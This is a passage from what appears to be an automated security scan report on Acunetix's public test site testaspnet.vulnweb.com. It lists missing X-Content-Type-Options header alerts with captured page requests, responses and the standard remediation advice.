          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        10. GET http://testaspnet.vulnweb.com/images/comment-after.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (347 bytes)
          GET http://testaspnet.vulnweb.com/images/comment-after.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "2c6507199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 1957
          
          
          Response body (1957 bytes)
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        11. GET http://testaspnet.vulnweb.com/images/comment-before.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (348 bytes)
          GET http://testaspnet.vulnweb.com/images/comment-before.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (248 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:54 GMT
          Accept-Ranges: bytes
          ETag: "6a79f47099c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 1919
          
          
          Response body (1919 bytes)
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        12. GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (328 bytes)
          GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (248 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "7228247199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2506
          
          
          Response body (2506 bytes)
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        13. GET http://testaspnet.vulnweb.com/images/rss.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (318 bytes)
          GET http://testaspnet.vulnweb.com/images/rss.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "8e76327199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 134
          
          
          Response body (134 bytes)
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        14. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        15. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

